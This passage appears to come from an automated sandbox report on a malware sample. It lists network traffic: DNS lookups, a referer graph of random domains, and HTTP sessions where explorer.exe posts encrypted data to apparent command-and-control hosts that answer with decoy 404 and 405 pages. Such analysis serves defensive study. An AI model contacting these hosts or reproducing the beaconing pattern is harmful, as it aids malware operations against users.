                                            Dec 19, 2024 11:01:41.326838970 CET5003480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:41.559287071 CET5003280192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:41.595247030 CET5003580192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:41.679421902 CET805003294.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:41.679573059 CET5003280192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:41.715002060 CET805003594.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:41.715082884 CET5003580192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:41.715229988 CET5003580192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:41.715244055 CET5003580192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:41.834784031 CET805003594.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:41.834892035 CET805003594.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:43.091700077 CET805003594.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:43.098989010 CET5003380192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:01:43.099733114 CET5003680192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:01:43.201831102 CET5003580192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:43.222151995 CET8050033194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:01:43.222215891 CET5003380192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:01:43.222803116 CET8050036194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:01:43.222882032 CET5003680192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:01:43.223036051 CET5003680192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:01:43.223078012 CET5003680192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:01:43.342860937 CET8050036194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:01:43.342977047 CET8050036194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:01:44.556948900 CET8050036194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:01:44.639354944 CET5003680192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:01:49.604857922 CET5003480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:49.605623960 CET5003780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:49.725018024 CET805003494.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:49.725275993 CET5003480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:49.725279093 CET805003794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:49.725372076 CET5003780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:49.725538015 CET5003780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:49.725586891 CET5003780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:01:49.846126080 CET805003794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:49.846189976 CET805003794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:51.089430094 CET805003794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:01:51.139377117 CET5003780192.168.2.594.156.177.51

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 19, 2024 10:58:10.189366102 CET6289753192.168.2.51.1.1.1
                                            Dec 19, 2024 10:58:10.835478067 CET53628971.1.1.1192.168.2.5
                                            Dec 19, 2024 10:58:12.325762033 CET5232553192.168.2.51.1.1.1
                                            Dec 19, 2024 10:58:12.970824957 CET53523251.1.1.1192.168.2.5
                                            Dec 19, 2024 10:58:14.483879089 CET6437553192.168.2.51.1.1.1
                                            Dec 19, 2024 10:58:15.282099962 CET53643751.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 19, 2024 10:58:10.189366102 CET192.168.2.51.1.1.10xc04cStandard query (0)constractionscity1991.latA (IP address)IN (0x0001)false
                                            Dec 19, 2024 10:58:12.325762033 CET192.168.2.51.1.1.10xe875Standard query (0)restructurisationservice.ruA (IP address)IN (0x0001)false
                                            Dec 19, 2024 10:58:14.483879089 CET192.168.2.51.1.1.10x336dStandard query (0)connecticutproperty.ruA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 19, 2024 10:58:10.835478067 CET1.1.1.1192.168.2.50xc04cNo error (0)constractionscity1991.lat94.156.177.51A (IP address)IN (0x0001)false
                                            Dec 19, 2024 10:58:12.970824957 CET1.1.1.1192.168.2.50xe875No error (0)restructurisationservice.ru94.156.177.51A (IP address)IN (0x0001)false
                                            Dec 19, 2024 10:58:15.282099962 CET1.1.1.1192.168.2.50x336dNo error (0)connecticutproperty.ru194.85.61.76A (IP address)IN (0x0001)false
                                            Dec 19, 2024 10:58:15.282099962 CET1.1.1.1192.168.2.50x336dNo error (0)connecticutproperty.ru109.70.26.37A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • ferxsaaokurf.com
                                              • constractionscity1991.lat
                                            • styqcrwcosyf.com
                                              • restructurisationservice.ru
                                            • fsprrtqwfiiffy.com
                                              • connecticutproperty.ru
                                            • mitmeuexacjewbqk.net
                                            • dfnihlnejuw.net
                                            • artooybeyrmney.net
                                            • sjfvofnibfsk.com
                                            • dyokvtiefurhr.org
                                            • vtrdqlyaxcnu.net
                                            • weaudxshysghyed.org
                                            • rmlqaewyesef.com
                                            • ipahuxcmqng.net
                                            • yebogyjrnkttg.com
                                            • mbqncgggetrc.com
                                            • qjvjeavryrj.com
                                            • jisidxjkipgcbgc.org
                                            • uloowasjyvbxjte.net
                                            • jghirgxdfdtfej.com
                                            • aemrvdevcrdbnu.net
                                            • caegqqrnvwyec.org
                                            • gnjdvgwpgdpin.com
                                            • randrxuiexkkd.org
                                            • egkbqdynffoi.com
                                            • jkpvubjbjugu.com
                                            • pekwfbrjnpwbirs.com
                                            • rllvcebkwfymagl.com
                                            • ylfiqfbsvxsdiv.net
                                            • ggphwqihuaca.net
                                            • nbcjwexjjibiqt.com
                                            • tjeuikagddjvc.com
                                            • yylbqgigqdkmsn.org
                                            • ufirisacqvk.net
                                            • ipingdnctvhe.net
                                            • xvohygrorigngv.net
                                            • iqmcbtituxk.net
                                            • rfcnfamftxutm.net
                                            • ukacgtlptxyqmcdq.net
                                            • daxnrqammsrat.org
                                            • dsjauwmdkccdd.com
                                            • tupclykpsytewcxu.org
                                            • livftrpgdgydc.com
                                            • drjnlhtrahircg.org
                                            • lhhcirujvotn.org
                                            • unomwhjdoaagckk.net
                                            • drmwwxjjhona.net
                                            • jqxnkwoysqpv.net
                                            • swhsbooovvrt.org
                                            • odsnbdoswem.net
                                            • jrdgusgumlecx.com
                                            • ljmtvjfukirthh.com
                                            • vlctchybxmsfmihs.net
                                            • sgmoymnkvjycr.com
                                            • nnfjblhdxniepv.org
                                            • gwxdktlpqqov.org
                                            • ygdgxkxjwyg.org
                                            • nqrqvcheqmo.net
                                            • fkdpjansght.com
                                            • viejsmtmgdxamty.com
                                            • quegfhrneryhjosy.org
                                            • ldbqkqcjtqgsavin.com
                                            • mmxcodigejxhlx.org

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.54973594.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:58:10.959477901 CET282OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ferxsaaokurf.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 367
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:58:10.959510088 CET367OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ac 1a 27 bd
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)'cq?Mm|G`!Ms$%%N#49F#tR#KFnZ*-RaR/oWAMw`b'\"|HSU]>[ZuO&NEP"\;e
                                            Dec 19, 2024 10:58:12.319236040 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:58:12 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.54974194.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:58:13.098994970 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://styqcrwcosyf.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 280
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:58:13.099046946 CET280OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8a 22 49 ce
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)"I/^ZRP4nS_#N\Zp"2nU=kpn^c`m}a`@XgYO@7}QPbViSo#gD;nC[}` al
                                            Dec 19, 2024 10:58:14.481053114 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:58:14 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549747194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:58:15.402757883 CET281OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://fsprrtqwfiiffy.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 252
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:58:15.402770042 CET252OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bd 0d 36 82
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)6=][F{Vi9UVtoSysPs`tl%/yI:cjjw&--2O5.~@.7$l$y2w"lx6VkyV"HYEQ"
                                            Dec 19, 2024 10:58:16.737190962 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:58:16 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.54989794.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:21.502511978 CET286OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mitmeuexacjewbqk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 361
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:21.502590895 CET361OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9c 49 7b 90
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)I{{2JH}Ml@(`/sqUcAq-'T|DYlF~d$qv;qdQ<Z|_W`{>WaFOu;raGQ9QT1J
                                            Dec 19, 2024 10:59:22.860023022 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:22 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.54990294.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:22.987339020 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dfnihlnejuw.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 268
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:22.987365007 CET268OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ee 3b 32 a9
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC);2Aj(VBsE;]m0j'|78{~rjd@gk}gB]S8L5^&A+Oa_&g&z!CPg1-fSS*q!Lz3lW
                                            Dec 19, 2024 10:59:24.480494976 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:24 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.549908194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:24.609102964 CET281OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://artooybeyrmney.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 171
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:24.609158039 CET171OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9a 5f 41 d4
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)_Aw{DBBaw5)`wX=kcR<,]hsVAttL"k:qA
                                            Dec 19, 2024 10:59:25.943614960 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:25 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.54991494.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:26.316266060 CET282OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://sjfvofnibfsk.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 156
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:26.316322088 CET156OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 84 39 2f cd
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)9/8dKA]$:L}u,kD^n+j%6nim
                                            Dec 19, 2024 10:59:27.673820019 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:27 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.54991594.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:27.820787907 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dyokvtiefurhr.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
